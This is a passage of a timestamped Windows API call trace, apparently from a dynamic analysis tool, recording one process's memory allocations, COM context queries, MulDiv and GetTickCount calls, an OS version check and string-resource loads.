	[0047.147] ??2@YAPEAX_K@Z () returned 0x277b70
	[0047.147] ??2@YAPEAX_K@Z () returned 0x277ba0
	[0047.148] ??2@YAPEAX_K@Z () returned 0x277ba0
	[0047.148] ??2@YAPEAX_K@Z () returned 0x277bd0
	[0047.148] ??2@YAPEAX_K@Z () returned 0x277c00
	[0047.148] ??2@YAPEAX_K@Z () returned 0x277c00
	[0047.149] ??2@YAPEAX_K@Z () returned 0x277c30
	[0047.149] ??2@YAPEAX_K@Z () returned 0x277c60
	[0047.149] ??2@YAPEAX_K@Z () returned 0x277c60
	[0047.149] ??2@YAPEAX_K@Z () returned 0x277c90
	[0047.149] ??2@YAPEAX_K@Z () returned 0x277cc0
	[0047.150] ??2@YAPEAX_K@Z () returned 0x277cc0
	[0047.150] ??2@YAPEAX_K@Z () returned 0x277cf0
	[0047.150] ??2@YAPEAX_K@Z () returned 0x277d20
	[0047.150] ??2@YAPEAX_K@Z () returned 0x277d20
	[0047.151] ??2@YAPEAX_K@Z () returned 0x277d50
	[0047.151] ??2@YAPEAX_K@Z () returned 0x277d80
	[0047.151] ??2@YAPEAX_K@Z () returned 0x277d80
	[0047.152] ??2@YAPEAX_K@Z () returned 0x277db0
	[0047.152] ??2@YAPEAX_K@Z () returned 0x277de0
	[0047.152] ??2@YAPEAX_K@Z () returned 0x277de0
	[0047.152] ??2@YAPEAX_K@Z () returned 0x277e10
	[0047.153] ??2@YAPEAX_K@Z () returned 0x277e40
	[0047.153] ??2@YAPEAX_K@Z () returned 0x277e40
	[0047.153] ??2@YAPEAX_K@Z () returned 0x277e70
	[0047.153] ??2@YAPEAX_K@Z () returned 0x277ea0
	[0047.153] ??2@YAPEAX_K@Z () returned 0x277ea0
	[0047.154] ??2@YAPEAX_K@Z () returned 0x277ed0
	[0047.154] ??2@YAPEAX_K@Z () returned 0x277f00
	[0047.154] ??2@YAPEAX_K@Z () returned 0x277f00
	[0047.154] ??2@YAPEAX_K@Z () returned 0x277f30
	[0047.154] ??2@YAPEAX_K@Z () returned 0x277f60
	[0047.155] ??2@YAPEAX_K@Z () returned 0x277f60
	[0047.155] ??2@YAPEAX_K@Z () returned 0x27ab80
	[0047.155] ??2@YAPEAX_K@Z () returned 0x27abb0
	[0047.155] ??2@YAPEAX_K@Z () returned 0x27abb0
	[0047.155] ??2@YAPEAX_K@Z () returned 0x27abe0
	[0047.156] ??2@YAPEAX_K@Z () returned 0x27ac10
	[0047.156] ??2@YAPEAX_K@Z () returned 0x27ac10
	[0047.156] ??2@YAPEAX_K@Z () returned 0x27ac40
	[0047.156] ??2@YAPEAX_K@Z () returned 0x27ac70
	[0047.157] ??2@YAPEAX_K@Z () returned 0x27ac70
	[0047.270] ??2@YAPEAX_K@Z () returned 0x27aca0
	[0047.271] ??2@YAPEAX_K@Z () returned 0x27acd0
	[0047.271] ??2@YAPEAX_K@Z () returned 0x27acd0
	[0047.271] ??2@YAPEAX_K@Z () returned 0x27ad00
	[0047.272] ??2@YAPEAX_K@Z () returned 0x27ad30
	[0047.272] ??2@YAPEAX_K@Z () returned 0x27ad30
	[0047.272] ??2@YAPEAX_K@Z () returned 0x27ad60
	[0047.272] ??2@YAPEAX_K@Z () returned 0x27ad90
	[0047.273] ??2@YAPEAX_K@Z () returned 0x27ad90
	[0047.273] ??2@YAPEAX_K@Z () returned 0x27adc0
	[0047.274] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.274] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0047.274] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.275] GetTickCount () returned 0x1d097
	[0047.276] realloc (_Block=0x0, _Size=0xc8) returned 0x275540
	[0047.374] ??2@YAPEAX_K@Z () returned 0x283be0
	[0047.375] ??2@YAPEAX_K@Z () returned 0x272fa0
	[0047.375] malloc (_Size=0x80) returned 0x274b30
	[0047.375] malloc (_Size=0x108) returned 0xd8c10
	[0047.376] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0047.414] realloc (_Block=0x0, _Size=0x64) returned 0x2714b0
	[0047.414] realloc (_Block=0x0, _Size=0x27c) returned 0x27cae0
	[0047.518] free (_Block=0x2714b0) 
	[0047.519] ??2@YAPEAX_K@Z () returned 0x284d60
	[0047.519] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2577f8 | out: ppv=0x2577f8*=0x40f420) returned 0x0
	[0047.520] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0047.520] ??3@YAXPEAX@Z () returned 0x1
	[0047.520] ??3@YAXPEAX@Z () returned 0x1900050001
	[0047.520] ??3@YAXPEAX@Z () returned 0x3400200001
	[0047.521] free (_Block=0x27ffc0) 
	[0047.521] free (_Block=0x275540) 
	[0047.521] free (_Block=0x2813d0) 
	[0047.521] free (_Block=0x27ebb0) 
	[0047.522] free (_Block=0x27d790) 
	[0047.522] free (_Block=0x27cd70) 
	[0047.522] free (_Block=0x27c850) 
	[0047.522] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0047.522] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0047.522] ??3@YAXPEAX@Z () returned 0x59000b0001
	[0047.522] free (_Block=0x2b1530) 
	[0047.522] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0047.522] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0047.522] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.522] GetTickCount () returned 0x1d190
	[0047.523] ??2@YAPEAX_K@Z () returned 0x27ba60
	[0047.523] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.523] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0047.523] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.523] GetTickCount () returned 0x1d190
	[0047.524] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.633] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0047.633] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.633] GetTickCount () returned 0x1d1fd
	[0047.636] ??2@YAPEAX_K@Z () returned 0x283830
	[0047.636] ??2@YAPEAX_K@Z () returned 0x271730
	[0047.637] realloc (_Block=0x0, _Size=0x64) returned 0x2714b0
	[0047.637] realloc (_Block=0x0, _Size=0xc8) returned 0x2b2cc0
	[0047.638] free (_Block=0x2714b0) 
	[0047.638] ??2@YAPEAX_K@Z () returned 0x289b00
	[0047.641] ??2@YAPEAX_K@Z () returned 0x28a750
	[0047.641] ??2@YAPEAX_K@Z () returned 0x270a40
	[0047.642] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.643] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0047.643] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.643] GetTickCount () returned 0x1d1fd
	[0047.645] malloc (_Size=0x208) returned 0x270ae0
	[0047.645] ??2@YAPEAX_K@Z () returned 0x2847d0
	[0047.646] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0047.648] ??2@YAPEAX_K@Z () returned 0x28a9f0
	[0047.648] ??2@YAPEAX_K@Z () returned 0x271730
	[0047.649] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2577f8 | out: ppv=0x2577f8*=0x40f420) returned 0x0
	[0047.649] ??3@YAXPEAX@Z () returned 0x1
	[0047.649] ??3@YAXPEAX@Z () returned 0x2000530001
	[0047.649] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0047.649] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.649] GetTickCount () returned 0x1d20d
	[0047.650] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.650] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0047.650] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.650] GetTickCount () returned 0x1d20d
	[0047.651] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.651] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0047.651] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.651] GetTickCount () returned 0x1d20d
	[0047.652] ??2@YAPEAX_K@Z () returned 0x282df0
	[0047.653] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0047.654] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.654] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0047.654] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.654] GetTickCount () returned 0x1d20d
	[0047.655] ??2@YAPEAX_K@Z () returned 0x275b40
	[0047.656] ??2@YAPEAX_K@Z () returned 0x271730
	[0047.657] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.657] ??3@YAXPEAX@Z () returned 0x1300620001
	[0047.657] ??3@YAXPEAX@Z () returned 0x14005f0001
	[0047.657] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0047.657] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.657] GetTickCount () returned 0x1d20d
	[0047.657] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.657] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0047.657] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.657] GetTickCount () returned 0x1d20d
	[0047.658] ??2@YAPEAX_K@Z () returned 0x276f90
	[0047.659] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0047.660] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.660] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0047.660] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.660] GetTickCount () returned 0x1d20d
	[0047.661] ??2@YAPEAX_K@Z () returned 0x284b90
	[0047.662] ??2@YAPEAX_K@Z () returned 0x271730
	[0047.664] ??2@YAPEAX_K@Z () returned 0x28a900
	[0047.664] ??2@YAPEAX_K@Z () returned 0x270a40
	[0047.665] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.665] ??3@YAXPEAX@Z () returned 0x1
	[0047.665] ??3@YAXPEAX@Z () returned 0x4900020001
	[0047.665] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0047.665] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.665] GetTickCount () returned 0x1d20d
	[0047.666] malloc (_Size=0x408) returned 0x292c80
	[0047.666] realloc (_Block=0x0, _Size=0xa0) returned 0x273050
	[0047.666] ??2@YAPEAX_K@Z () returned 0x28aa80
	[0047.791] ??2@YAPEAX_K@Z () returned 0x271730
	[0047.792] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.793] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0047.793] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.793] GetTickCount () returned 0x1d299
	[0047.794] ??2@YAPEAX_K@Z () returned 0x27c0b0
	[0047.795] ??2@YAPEAX_K@Z () returned 0x270a40
	[0047.795] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.796] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0047.796] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.796] GetTickCount () returned 0x1d299
	[0047.797] ??2@YAPEAX_K@Z () returned 0x27c940
	[0047.797] ??2@YAPEAX_K@Z () returned 0x271730
	[0047.799] ??2@YAPEAX_K@Z () returned 0x2830c0
	[0047.800] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0047.801] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.801] ??3@YAXPEAX@Z () returned 0x1
	[0047.801] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0047.801] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.801] GetTickCount () returned 0x1d299
	[0047.804] ??2@YAPEAX_K@Z () returned 0x2848f0
	[0047.804] ??2@YAPEAX_K@Z () returned 0x271730
	[0047.806] ??2@YAPEAX_K@Z () returned 0x27cb20
	[0047.806] GetVersionExA (in: lpVersionInformation=0x25c880*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xd12f0, dwBuildNumber=0x0, dwPlatformId=0x40e198, szCSDVersion="") | out: lpVersionInformation=0x25c880*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0047.806] FindResourceA (hModule=0x7fee32d0000, lpName=0x139, lpType=0x6) returned 0x1307f8
	[0048.193] LoadResource (hModule=0x7fee32d0000, hResInfo=0x1307f8) returned 0x131d44
	[0048.193] LockResource (hResData=0x131d44) returned 0x131d44
	[0048.193] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x1307f8) returned 0x15c
	[0048.193] FreeResource (hResData=0x131d44) returned 0
	[0048.193] FindResourceA (hModule=0x7fee32d0000, lpName=0x101, lpType=0x6) returned 0x1307e8
	[0048.193] LoadResource (hModule=0x7fee32d0000, hResInfo=0x1307e8) returned 0x131c74
	[0048.193] LockResource (hResData=0x131c74) returned 0x131c74
	[0048.193] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x1307e8) returned 0xce
	[0048.194] FreeResource (hResData=0x131c74) returned 0
	[0048.194] bsearch (_Key=0x25d218, _Base=0x7fee339a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee33281a0) returned 0x7fee339a5a8
	[0048.194] ??2@YAPEAX_K@Z () returned 0x270a40
	[0048.196] ??2@YAPEAX_K@Z () returned 0x271a40
	[0048.196] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.197] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0048.197] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.197] GetTickCount () returned 0x1d410
	[0048.198] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.200] ??2@YAPEAX_K@Z () returned 0x2989f0
	[0048.200] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.202] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2577f8 | out: ppv=0x2577f8*=0x40f420) returned 0x0
	[0048.202] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0048.202] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.202] GetTickCount () returned 0x1d410
	[0048.203] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.203] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0048.203] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.203] GetTickCount () returned 0x1d410
	[0048.204] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.245] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0048.245] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.245] GetTickCount () returned 0x1d43f
	[0048.245] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.246] ??2@YAPEAX_K@Z () returned 0x2f8f70
	[0048.247] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.249] ??2@YAPEAX_K@Z () returned 0x2f9be0
	[0048.249] ??2@YAPEAX_K@Z () returned 0x271a40
	[0048.249] GetTickCount () returned 0x1d43f
	[0048.250] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.251] realloc (_Block=0x273050, _Size=0x140) returned 0x285710
	[0048.251] ??2@YAPEAX_K@Z () returned 0x27ce50
	[0048.252] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.252] GetTickCount () returned 0x1d43f
	[0048.252] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.254] ??2@YAPEAX_K@Z () returned 0x296090
	[0048.254] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.254] GetTickCount () returned 0x1d44e
	[0048.254] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.254] free (_Block=0x2c43e0) 
	[0048.254] free (_Block=0x299160) 
	[0048.254] free (_Block=0x2e4fa0) 
	[0048.254] free (_Block=0x2c2fd0) 
	[0048.254] free (_Block=0x2b2fd0) 
	[0048.255] free (_Block=0x28acb0) 
	[0048.255] free (_Block=0x27e9d0) 
	[0048.255] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0048.255] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0048.256] ??2@YAPEAX_K@Z () returned 0x2962d0
	[0048.257] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.258] ??2@YAPEAX_K@Z () returned 0x297570
	[0048.259] ??2@YAPEAX_K@Z () returned 0x2724d0
	[0048.259] GetTickCount () returned 0x1d44e
	[0048.259] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.259] free (_Block=0x2c43e0) 
	[0048.259] free (_Block=0x299160) 
	[0048.259] free (_Block=0x2e4fa0) 
	[0048.259] free (_Block=0x2c2fd0) 
	[0048.259] free (_Block=0x2b2fd0) 
	[0048.259] free (_Block=0x28acb0) 
	[0048.259] free (_Block=0x27e9d0) 
	[0048.259] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0048.259] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0048.260] malloc (_Size=0x808) returned 0x297f10
	[0048.261] ??2@YAPEAX_K@Z () returned 0x297840
	[0048.261] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.263] ??2@YAPEAX_K@Z () returned 0x2967b0
	[0048.263] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.265] ??2@YAPEAX_K@Z () returned 0x29cfb0
	[0048.266] ??2@YAPEAX_K@Z () returned 0x271a40
	[0048.266] GetTickCount () returned 0x1d44e
	[0048.266] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.268] ??2@YAPEAX_K@Z () returned 0x2f90d0
	[0048.269] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.270] ??2@YAPEAX_K@Z () returned 0x2f9910
	[0048.270] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.272] ??2@YAPEAX_K@Z () returned 0x296870
	[0048.272] ??2@YAPEAX_K@Z () returned 0x2724d0
	[0048.272] GetTickCount () returned 0x1d45e
	[0048.273] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.273] free (_Block=0x2c43e0) 
	[0048.273] free (_Block=0x299160) 
	[0048.273] free (_Block=0x2e4fa0) 
	[0048.273] free (_Block=0x2c2fd0) 
	[0048.273] free (_Block=0x2b2fd0) 
	[0048.273] free (_Block=0x28acb0) 
	[0048.273] free (_Block=0x27e9d0) 
	[0048.273] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0048.273] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0048.274] ??2@YAPEAX_K@Z () returned 0x27cee0
	[0048.275] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.275] GetTickCount () returned 0x1d45e
	[0048.275] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.276] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.277] MulDiv (nNumber=756, nNumerator=100, nDenominator=3006) returned 25
	[0048.277] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.277] GetTickCount () returned 0x1d45e
	[0048.277] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.283] ??2@YAPEAX_K@Z () returned 0x2fcee0
	[0048.284] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.285] ??2@YAPEAX_K@Z () returned 0x2fd5a0
	[0048.286] ??2@YAPEAX_K@Z () returned 0x271a40
	[0048.287] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0048.287] MulDiv (nNumber=1142, nNumerator=100, nDenominator=3532) returned 32
	[0048.287] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.287] GetTickCount () returned 0x1d45e
	[0048.288] ??2@YAPEAX_K@Z () returned 0x301e10
	[0048.288] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.290] ??2@YAPEAX_K@Z () returned 0x302a10
	[0048.290] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.292] ??2@YAPEAX_K@Z () returned 0x2714b0
	[0048.293] ??2@YAPEAX_K@Z () returned 0x2724d0
	[0048.293] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2577f8 | out: ppv=0x2577f8*=0x40f420) returned 0x0
	[0048.293] ??3@YAXPEAX@Z () returned 0x1
	[0048.293] ??3@YAXPEAX@Z () returned 0x3d00980001
	[0048.295] ??2@YAPEAX_K@Z () returned 0x271730
	[0048.297] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0048.301] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2577f8 | out: ppv=0x2577f8*=0x40f420) returned 0x0
	[0048.301] MulDiv (nNumber=941, nNumerator=100, nDenominator=3335) returned 28
	[0048.302] IUnknown:Release (This=0x40f420) returned 0x1
	[0048.302] GetTickCount () returned 0x1d46d
	[0048.303] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x255a68 | out: ppv=0x255a68*=0x40f420) returned 0x0
	[0048.303] ??3@YAXPEAX@Z () returned 0x1
	[0048.303] ??3@YAXPEAX@Z () returned 0x15100350001
	[0048.305] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2577f8 | out: ppv=0x2577f8*=0x40f420) returned 0x0
	[0048.305] MulDiv (nNumber=985, nNumerator=100, nDenominator=3412) returned 29
	[0048.305] IUnknown:Release (This=0x40f420) returned 0x1
